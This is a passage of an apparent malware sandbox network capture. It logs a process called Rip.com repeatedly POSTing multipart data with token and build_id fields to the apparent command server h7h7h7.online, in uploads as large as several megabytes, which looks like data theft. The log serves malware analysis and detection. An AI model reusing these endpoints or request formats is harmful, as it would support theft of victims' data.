sec-ch-ua-platform: "Windows"
Accept: */*
X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-31 20:40:22 UTC | 916 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
Content-Length: 117446
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Fri, 27 Dec 2024 08:45:49 GMT
Expires: Sat, 27 Dec 2025 08:45:49 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Age: 388473
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49764 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:23 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----3o8y5pp8q9rqim7y5pzm
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 505
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:23 UTC | 505 | OUT | Data Ascii: ------3o8y5pp8q9rqim7y5pzmContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------3o8y5pp8q9rqim7y5pzmContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------3o8y5pp8q9rqim7y5pzmCont
2024-12-31 20:40:25 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:25 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49768 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:24 UTC | 281 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----nozukfct00zuaaa1vkfu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:24 UTC | 16355 | OUT | Data Ascii: ------nozukfct00zuaaa1vkfuContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------nozukfct00zuaaa1vkfuContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------nozukfct00zuaaa1vkfuCont
2024-12-31 20:40:26 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49769 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:26 UTC | 280 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----8gdtrqimyusrimgdba1d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:26 UTC | 16355 | OUT | Data Ascii: ------8gdtrqimyusrimgdba1dContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------8gdtrqimyusrimgdba1dContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------8gdtrqimyusrimgdba1dCont
2024-12-31 20:40:27 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:27 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
15  192.168.2.4  49770  116.203.13.109  443  7740  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com

Timestamp  Bytes transferred  Direction  Data
2024-12-31 20:40:27 UTC  281  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----biwt0r9hvai5f379z5pz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:27 UTC  16355  OUT  Data Ascii:
------biwt0r9hvai5f379z5pz
Content-Disposition: form-data; name="token"

2501d44103c55efc5f73d4da6882b199
------biwt0r9hvai5f379z5pz
Content-Disposition: form-data; name="build_id"

f4c9ac30c7e86011d996b9b6076307b5
------biwt0r9hvai5f379z5pz
Cont
2024-12-31 20:40:29 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:29 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
16  192.168.2.4  49771  116.203.13.109  443  7740  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com

Timestamp  Bytes transferred  Direction  Data
2024-12-31 20:40:28 UTC  278  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----oz5fcjm79riw479rq1no
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:28 UTC  493  OUT  Data Ascii:
------oz5fcjm79riw479rq1no
Content-Disposition: form-data; name="token"

2501d44103c55efc5f73d4da6882b199
------oz5fcjm79riw479rq1no
Content-Disposition: form-data; name="build_id"

f4c9ac30c7e86011d996b9b6076307b5
------oz5fcjm79riw479rq1no
Cont
2024-12-31 20:40:29 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:29 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49772 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:30 UTC | 281 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9z5fu3ohlnycjmycjw47
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 169765
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:30 UTC | 16355 | OUT | Data Ascii: ------9z5fu3ohlnycjmycjw47Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------9z5fu3ohlnycjmycjw47Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------9z5fu3ohlnycjmycjw47Cont
2024-12-31 20:40:31 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49773 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:31 UTC | 280 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----kf37qimymo89rie3wbim
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 66001
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:31 UTC | 16355 | OUT | Data Ascii: ------kf37qimymo89rie3wbimContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------kf37qimymo89rie3wbimContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------kf37qimymo89rie3wbimCont
2024-12-31 20:40:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:32 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49774 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com

Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:32 UTC | 281 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----pzukxlf37g4ozmyusjeu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 153381
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:32 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 70 7a 75 6b 78 6c 66 33 37 67 34 6f 7a 6d 79 75 73 6a 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 70 7a 75 6b 78 6c 66 33 37 67 34 6f 7a 6d 79 75 73 6a 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 70 7a 75 6b 78 6c 66 33 37 67 34 6f 7a 6d 79 75 73 6a 65 75 0d 0a 43 6f 6e 74
Data Ascii: ------pzukxlf37g4ozmyusjeuContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------pzukxlf37g4ozmyusjeuContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------pzukxlf37g4ozmyusjeuCont
2024-12-31 20:40:34 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49775 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com

Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:33 UTC | 281 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----0zcb16xbi5fkn79hdj58
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:33 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 30 7a 63 62 31 36 78 62 69 35 66 6b 6e 37 39 68 64 6a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 30 7a 63 62 31 36 78 62 69 35 66 6b 6e 37 39 68 64 6a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 30 7a 63 62 31 36 78 62 69 35 66 6b 6e 37 39 68 64 6a 35 38 0d 0a 43 6f 6e 74
Data Ascii: ------0zcb16xbi5fkn79hdj58Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------0zcb16xbi5fkn79hdj58Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------0zcb16xbi5fkn79hdj58Cont
                                                                                                                                                                                                                                                              2024-12-31 20:40:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 20:40:35 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:35 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49776 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:34 UTC | 281 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----p8y58glxbsr9zukxtjek
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 131557
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:34 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 70 38 79 35 38 67 6c 78 62 73 72 39 7a 75 6b 78 74 6a 65 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 70 38 79 35 38 67 6c 78 62 73 72 39 7a 75 6b 78 74 6a 65 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 70 38 79 35 38 67 6c 78 62 73 72 39 7a 75 6b 78 74 6a 65 6b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------p8y58glxbsr9zukxtjekContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------p8y58glxbsr9zukxtjekContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------p8y58glxbsr9zukxtjekCont
2024-12-31 20:40:36 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:36 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-31 20:40:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49777 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:36 UTC | 282 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----a1vsjeknyukx4ekxt0ri
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 6990993
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:36 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 61 31 76 73 6a 65 6b 6e 79 75 6b 78 34 65 6b 78 74 30 72 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 61 31 76 73 6a 65 6b 6e 79 75 6b 78 34 65 6b 78 74 30 72 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 61 31 76 73 6a 65 6b 6e 79 75 6b 78 34 65 6b 78 74 30 72 69 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------a1vsjeknyukx4ekxt0riContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------a1vsjeknyukx4ekxt0riContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------a1vsjeknyukx4ekxt0riCont
2024-12-31 20:40:44 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
23  192.168.2.4  49778  116.203.13.109  443  7740  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp  Bytes transferred  Direction  Data
2024-12-31 20:40:38 UTC  278  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9z5fu3ohlnycjmycjw47
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:38 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 39 7a 35 66 75 33 6f 68 6c 6e 79 63 6a 6d 79 63 6a 77 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 39 7a 35 66 75 33 6f 68 6c 6e 79 63 6a 6d 79 63 6a 77 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 39 7a 35 66 75 33 6f 68 6c 6e 79 63 6a 6d 79 63 6a 77 34 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------9z5fu3ohlnycjmycjw47Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------9z5fu3ohlnycjmycjw47Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------9z5fu3ohlnycjmycjw47Cont
2024-12-31 20:40:39 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
